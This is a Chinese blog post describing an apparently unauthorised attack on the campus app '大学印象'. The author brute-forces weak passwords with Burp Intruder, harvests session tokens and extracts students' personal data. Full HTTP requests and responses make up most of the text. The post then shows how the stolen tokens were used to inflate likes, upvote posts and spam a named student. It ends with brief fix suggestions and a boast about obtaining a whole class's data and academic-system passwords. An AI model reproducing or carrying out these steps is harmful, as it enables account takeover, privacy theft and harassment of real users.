这个漏洞其实我很久之前就发现了,因为一直忙着学习Metasploit,一直没有时间写文章。最近学累了,干脆玩玩简单的东西吧。

对常用号段批量扫描弱口令,截止发稿时,共发现66个用户使用了弱口令。

 使用Burp Suite 的Intruder模块进行扫描:

POST区域

POST /Account/Login/index HTTP/1.1
Host: 7.dxever.applinzi.com
Proxy-Connection: keep-alive
Content-Length: 29
Accept: application/json
Origin: file://
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 7.0; 1 Build/LRX21V; wv) AppleWebKit/538.00 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Html5Plus/1.0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: PHPSESSID=y5673ws742395bjuk33fg3267h78lbeccd
 
phone=§18812345678§&password=123456

当密码错误时,Response的内容如下:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Mar 2018 14:45:46 GMT
Content-Type: application/json; charset=utf8
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 200 OK
Via: 1527
Content-Length: 94
 
{"meta":{"code":"401","message":"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef\u3002"},"data":[]}

密码正确时,Response :

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 22 Mar 2018 15:15:00 GMT
Content-Type: application/json; charset=utf8
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 200 OK
Via: 15146
Content-Length: 325
 
{"meta":{"code":"200","message":"\u6210\u529f"},"data":{"userid":"7181","name":"\u738b\*****","image":"http:\/\/dxever.s3.sinaapp.com\/myfiles\/*****.jpg","schoolcode":"412","type":"normal","schoolname":"\u5927\u8fde\u5de5\u4e1a\u5927\u5b66","channel":"","token":"5339ed49225be92b97de8dcb560*****"}}

将以上结果批量导出,在Notepad++中使用正则表达式找出所有“token”项,Burp Suite中设置Payload,批量请求:

POST /index.php/User/UserRebuild/getUserInfo HTTP/1.1
Host: 6.dxever.applinzi.com
Proxy-Connection: keep-alive
Content-Length: 38
Accept: application/json
Origin: file://
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 7.0; 1 Build/LRX21V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Html5Plus/1.0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: PHPSESSID=504d6f5246sjox6q0032b8e5c21b4dea
 
token=$b986a358d4c02fef91b58f4de9******$

这样就得出了学生数据:

{"meta":{"code":200,"message":"\u6210\u529f"},"data":{"userData":{"name":"\u9ad8\*****\*****","image":"http:\/\/dxever.s3.sinaapp.com\/*****.jpg","sex":"\u5973","userid":"22215","bgImage":null,"grade":"2017\u7ea7","college":"\u827a\u672f\u8bbe\u8ba1\u5b66\u9662","major":""},"userInfo":{"hometown":"\u5c1a\u672a\u586b\u5199","club":"\u5c1a\u672a\u586b\u5199","circle":[],"dorm":"\u5c1a\u672a\u586b\u5199","constellation":"\u5c1a\u672a\u586b\u5199","hobby":"\u5c1a\u672a\u586b\u5199","love":"\u5c1a\u672a\u586b\u5199","writeline":"\u5c1a\u672a\u586b\u5199","channel":"cpc_22215"},"numInfo":["0","1","1","1",0,0],"album":[],"usertype":"normal","channel":""}}

Unicode解码,得到

{"meta":{"code":200,"message":"成功"},"data":{"userData":{"name":"高**","image":"http:\/\/dxever.s3.sinaapp.com\/*****.jpg","sex":"女","userid":"22215","bgImage":null,"grade":"2017级","college":"艺术设计学院","major":""},"userInfo":{"hometown":"尚未填写","club":"尚未填写","circle":[],"dorm":"尚未填写","constellation":"尚未填写","hobby":"尚未填写","love":"尚未填写","writeline":"尚未填写","channel":"cpc_22215"},"numInfo":["0","1","1","1",0,0],"album":[],"usertype":"normal","channel":""}}

将数据批量导出

20180321221208.png

得到这些数据有什么用呢?

1.给“你真好看”刷赞。

设置Payload批量请求:

POST /Beautiful/Index/thinkBeautiful HTTP/1.1
Host: 7.dxever.applinzi.com
Proxy-Connection: keep-alive
Content-Length: 46
Accept: application/json
Origin: file://
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 7.0; 1 Build/LRX21V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Html5Plus/1.0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: PHPSESSID=d99fadb5ed37731c6ce1be189cf257dc
 
token=$b986a358d4c02fef91b58f4de9******$&bid=?//bid通过抓包得到

假如你掌握的用户较多,用不了几秒就排第一了。

2.批量给表白墙刷UP。

POST /index.php/CircleForum/ConfessionWowRebuild/momentsendwow HTTP/1.1
Host: 6.dxever.applinzi.com
Proxy-Connection: keep-alive
Content-Length: 56
Accept: application/json
Origin: file://
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 7.0; 1 Build/LRX21V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Html5Plus/1.0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: PHPSESSID=504d6f5005b0866b4032b8e5c21*****
 
token=866891c39c7b2334bce7c10ad8c*****&mid=?&type=up //mid通过抓包得到

3.批量给黄骆俊杰发“我爱你”。

POST /index.php/Whisper/WhisperSend/sendwhisper HTTP/1.1
Host: 6.dxever.applinzi.com
Proxy-Connection: keep-alive
Content-Length: 94
Accept: application/json
Origin: file://
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 7.0; 1 Build/LRX21V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 Html5Plus/1.0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: PHPSESSID=504d6f5005b0866b4032b8e5c21*****
 
token=866891c39c7b2334bce7c10ad8c*****&his_id=94&content=%E6%88%91%E7%88%B1%E4%BD%A0&type=text  //his_id通过抓包得到

4.大会上随意刷屏。......

5.破解任意聊天室密码。......

 

由于服务器对单IP单位时间内请求次数没有限制,可以猜想:

1.通过穷举6位数短信验证码,任意重置任何人的密码。

2.批量投放广告。

......

 

不知道开发组会不会修复这个漏洞。如果将来“大学印象”的客户范围扩大,那么希望开发组不要忽视这种“小漏洞”。另外,微信端一样存在这个漏洞,只不过在抓取https时得安装CA证书和解码而已。

 

修复建议:

1.在重置密码处增加验证码。

2.限制单IP并发请求。

3.频繁操作时增加验证码。

4.禁止密码设置为弱口令。(开发组有几个大神也用弱口令...)

后续:发现了更多漏洞,成功获取到全年级同学的信息,包括教务处密码。我也不知道怎么传到导员那里的,就差请我喝茶了...